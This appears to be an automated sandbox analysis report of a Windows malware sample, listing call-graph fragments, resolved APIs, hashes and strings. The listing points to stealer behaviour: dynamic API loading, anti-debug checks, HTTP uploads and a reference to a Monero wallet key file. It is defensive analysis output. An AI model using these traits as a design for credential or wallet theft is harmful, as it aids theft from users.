15714->15715 15716 5f5313 15715->15716 15717 5f5329 InternetConnectA 15716->15717 15717->15693 15718 5f5359 HttpOpenRequestA 15717->15718 15720 5f58b7 InternetCloseHandle 15718->15720 15721 5f53b7 15718->15721 15720->15693 15722 60a9b0 4 API calls 15721->15722 15723 5f53cb 15722->15723 15724 60a8a0 lstrcpy 15723->15724 15725 5f53d4 15724->15725 15726 60a920 3 API calls 15725->15726 15727 5f53f2 15726->15727 15728 60a8a0 lstrcpy 15727->15728 15729 5f53fb 15728->15729 15730 60a9b0 4 API calls 15729->15730 15731 5f541a 15730->15731 15732 60a8a0 lstrcpy 15731->15732 15733 5f5423 15732->15733 15734 60a9b0 4 API calls 15733->15734 15735 5f5444 15734->15735 15736 60a8a0 lstrcpy 15735->15736 15737 5f544d 15736->15737 15738 60a9b0 4 API calls 15737->15738 15739 5f546e 15738->15739 15832 608ea9 15831->15832 15833 608ead CryptBinaryToStringA 15831->15833 15832->15677 15833->15832 15834 608ece GetProcessHeap RtlAllocateHeap 15833->15834 15834->15832 15835 608ef4 codecvt 15834->15835 15836 608f05 CryptBinaryToStringA 15835->15836 15836->15832 15840->15113 16083 5f9880 15841->16083 15843 5f98e1 15843->15120 15845 60a740 lstrcpy 15844->15845 16018 60a740 lstrcpy 16017->16018 16019 600266 16018->16019 16020 608de0 2 API calls 16019->16020 16021 60027b 16020->16021 16022 60a920 3 API calls 16021->16022 16023 60028b 16022->16023 16024 60a8a0 lstrcpy 16023->16024 16025 600294 16024->16025 16026 60a9b0 4 API calls 16025->16026 16084 5f988e 16083->16084 16087 5f6fb0 16084->16087 16086 5f98ad codecvt 16086->15843 16090 5f6d40 16087->16090 16091 5f6d63 16090->16091 16101 5f6d59 16090->16101 16106 5f6530 16091->16106 16095 5f6dbe 16095->16101 16116 5f69b0 16095->16116 16097 5f6e2a 16098 5f6ef7 16097->16098 16099 5f6ee6 VirtualFree 16097->16099 16097->16101 16100 5f6f41 16098->16100 16102 5f6f38 16098->16102 16103 5f6f26 FreeLibrary 16098->16103 16099->16098 16100->16101 16104 6089f0 2 API calls 16100->16104 16101->16086 16105 6089f0 2 API calls 16102->16105 16103->16098 16104->16101 16105->16100 16107 5f6542 16106->16107 16109 5f6549 16107->16109 16126 608a10 GetProcessHeap RtlAllocateHeap 16107->16126 16109->16101 16110 5f6660 16109->16110 16115 5f668f VirtualAlloc 16110->16115 16112 5f6730 16113 5f673c 16112->16113 16114 5f6743 VirtualAlloc 16112->16114 16113->16095 16114->16113 16115->16112 16115->16113 16117 5f69c9 16116->16117 16121 5f69d5 16116->16121 16118 5f6a09 LoadLibraryA 16117->16118 16117->16121 16119 5f6a32 16118->16119 16118->16121 16122 5f6ae0 16119->16122 16127 608a10 GetProcessHeap RtlAllocateHeap 16119->16127 16121->16097 16122->16121 16124 5f6ba8 GetProcAddress 16122->16124 16123 5f6a8b 16123->16121 16125 6089f0 2 API calls 16123->16125 16124->16121 16124->16122 16125->16122 16126->16109 16127->16123

                            Executed Functions

                            Function 00609860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 609860-609874 call 609750 663 609a93-609af2 LoadLibraryA * 5 660->663 664 60987a-609a8e call 609780 GetProcAddress * 21 660->664 666 609af4-609b08 GetProcAddress 663->666 667 609b0d-609b14 663->667 664->663 666->667 669 609b46-609b4d 667->669 670 609b16-609b41 GetProcAddress * 2 667->670 671 609b68-609b6f 669->671 672 609b4f-609b63 GetProcAddress 669->672 670->669 673 609b71-609b84 GetProcAddress 671->673 674 609b89-609b90 671->674 672->671 673->674 675 609bc1-609bc2 674->675 676 609b92-609bbc GetProcAddress * 2 674->676 676->675
                            APIs
                            • GetProcAddress.KERNEL32(75900000,01400618), ref: 006098A1
                            • GetProcAddress.KERNEL32(75900000,01400720), ref: 006098BA
                            • GetProcAddress.KERNEL32(75900000,014005A0), ref: 006098D2
                            • GetProcAddress.KERNEL32(75900000,014005B8), ref: 006098EA
                            • GetProcAddress.KERNEL32(75900000,014007F8), ref: 00609903
                            • GetProcAddress.KERNEL32(75900000,01408890), ref: 0060991B
                            • GetProcAddress.KERNEL32(75900000,013F6480), ref: 00609933
                            • GetProcAddress.KERNEL32(75900000,013F65E0), ref: 0060994C
                            • GetProcAddress.KERNEL32(75900000,014007B0), ref: 00609964
                            • GetProcAddress.KERNEL32(75900000,014007E0), ref: 0060997C
                            • GetProcAddress.KERNEL32(75900000,01400810), ref: 00609995
                            • GetProcAddress.KERNEL32(75900000,01400708), ref: 006099AD
                            • GetProcAddress.KERNEL32(75900000,013F6440), ref: 006099C5
                            • GetProcAddress.KERNEL32(75900000,01400840), ref: 006099DE
                            • GetProcAddress.KERNEL32(75900000,014005D0), ref: 006099F6
                            • GetProcAddress.KERNEL32(75900000,013F6340), ref: 00609A0E
                            • GetProcAddress.KERNEL32(75900000,014006A8), ref: 00609A27
                            • GetProcAddress.KERNEL32(75900000,01400738), ref: 00609A3F
                            • GetProcAddress.KERNEL32(75900000,013F6640), ref: 00609A57
                            • GetProcAddress.KERNEL32(75900000,014005E8), ref: 00609A70
                            • GetProcAddress.KERNEL32(75900000,013F6600), ref: 00609A88
                            • LoadLibraryA.KERNEL32(01400558,?,00606A00), ref: 00609A9A
                            • LoadLibraryA.KERNEL32(01400750,?,00606A00), ref: 00609AAB
                            • LoadLibraryA.KERNEL32(01400768,?,00606A00), ref: 00609ABD
                            • LoadLibraryA.KERNEL32(01400798,?,00606A00), ref: 00609ACF
                            • LoadLibraryA.KERNEL32(01400648,?,00606A00), ref: 00609AE0
                            • GetProcAddress.KERNEL32(75070000,014007C8), ref: 00609B02
                            • GetProcAddress.KERNEL32(75FD0000,01400660), ref: 00609B23
                            • GetProcAddress.KERNEL32(75FD0000,01408D18), ref: 00609B3B
                            • GetProcAddress.KERNEL32(75A50000,01408CB8), ref: 00609B5D
                            • GetProcAddress.KERNEL32(74E50000,013F6620), ref: 00609B7E
                            • GetProcAddress.KERNEL32(76E80000,01408840), ref: 00609B9F
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00609BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00609BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: b27ba0f696ca45886f47da74c02f0f918353664233011eb6d95b5498fdbd0a32
                            • Instruction ID: 60061440064d6688a3bbbc853cd8b1495f243b4b36bdf8ecb36d902b9d65bfd1
                            • Opcode Fuzzy Hash: b27ba0f696ca45886f47da74c02f0f918353664233011eb6d95b5498fdbd0a32
                            • Instruction Fuzzy Hash: F7A12AB55052449FD34CEFA8ED88A663BF9F7EC3017048D2AA6C5C3264D7799841CB62
                            Function 005F45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 5f45c0-5f4695 RtlAllocateHeap 781 5f46a0-5f46a6 764->781 782 5f474f-5f47a9 VirtualProtect 781->782 783 5f46ac-5f474a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F460E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 005F479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F45C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F45E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F45F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F45DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F45D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F462D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 01d0ad24207df5b7d7e8686b845ff8d39fc11457372f01986f9b0a8d160b17cd
                            • Instruction ID: 98bed77e327668300d07cb023fe5365cba173c78b0bfecc35ddd8c00aa511d4b
                            • Opcode Fuzzy Hash: 01d0ad24207df5b7d7e8686b845ff8d39fc11457372f01986f9b0a8d160b17cd
                            • Instruction Fuzzy Hash: 0A4178657C2604FFE664B7A5A84EDDDB663DF8E700F897140FA015A2C2CFB867A04D21
                            Function 005F4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 5f4880-5f4942 call 60a7a0 call 5f47b0 call 60a740 * 5 InternetOpenA StrCmpCA 816 5f494b-5f494f 801->816 817 5f4944 801->817 818 5f4ecb-5f4ef3 InternetCloseHandle call 60aad0 call 5f9ac0 816->818 819 5f4955-5f4acd call 608b60 call 60a920 call 60a8a0 call 60a800 * 2 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a920 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a920 call 60a8a0 call 60a800 * 2 InternetConnectA 816->819 817->816 829 5f4ef5-5f4f2d call 60a820 call 60a9b0 call 60a8a0 call 60a800 818->829 830 5f4f32-5f4fa2 call 608990 * 2 call 60a7a0 call 60a800 * 8 818->830 819->818 905 5f4ad3-5f4ad7 819->905 829->830 906 5f4ad9-5f4ae3 905->906 907 5f4ae5 905->907 908 5f4aef-5f4b22 HttpOpenRequestA 906->908 907->908 909 5f4ebe-5f4ec5 InternetCloseHandle 908->909 910 5f4b28-5f4e28 call 60a9b0 call 60a8a0 call 60a800 call 60a920 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a920 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a920 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a9b0 call 60a8a0 call 60a800 call 60a920 call 60a8a0 call 60a800 call 60a740 call 60a920 * 2 call 60a8a0 call 60a800 * 2 call 60aad0 lstrlen call 60aad0 * 2 lstrlen call 60aad0 HttpSendRequestA 908->910 909->818 1021 5f4e32-5f4e5c InternetReadFile 910->1021 1022 5f4e5e-5f4e65 1021->1022 1023 5f4e67-5f4eb9 InternetCloseHandle call 60a800 1021->1023 1022->1023 1024 5f4e69-5f4ea7 call 60a9b0 call 60a8a0 call 60a800 1022->1024 1023->909 1024->1021
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005F4915
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F4ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00610DDB,00000000,?,?,00000000,?,",00000000,?,0140E4C0), ref: 005F4DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005F4E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005F4E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005F4E49
                            • InternetCloseHandle.WININET(00000000), ref: 005F4EAD
                            • InternetCloseHandle.WININET(00000000), ref: 005F4EC5
                            • HttpOpenRequestA.WININET(00000000,0140E490,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F4B15
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • InternetCloseHandle.WININET(00000000), ref: 005F4ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 84d075260fe9d2ec4cc6f28b22bdcea61d4aafbbba1e454d5ef03849a160c869
                            • Instruction ID: 77ebac9a5b1c9fa0551549a77ea7899f3a979fe401d4ecdc2faccc524f593597
                            • Opcode Fuzzy Hash: 84d075260fe9d2ec4cc6f28b22bdcea61d4aafbbba1e454d5ef03849a160c869
                            • Instruction Fuzzy Hash: E112E871951218AADB58EB90DD92FEFB33ABF54340F50819DB106620D1EF702E49CF6A
                            Function 00607850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0060789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 12ed1b349578da8d31b7cd11d6b2489a41a3d178886c294b5cf02fe83bb72c29
                            • Instruction ID: d028aae41791f3c8b619519cc72615f25e8092ec2267f17b0c4a4eff53c5d191
                            • Opcode Fuzzy Hash: 12ed1b349578da8d31b7cd11d6b2489a41a3d178886c294b5cf02fe83bb72c29
                            • Instruction Fuzzy Hash: 46F04FB1D44208ABC704DF98DD49BAFFBB8FB44721F10066AFA45A2680C77515048BA1
                            Function 005F1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
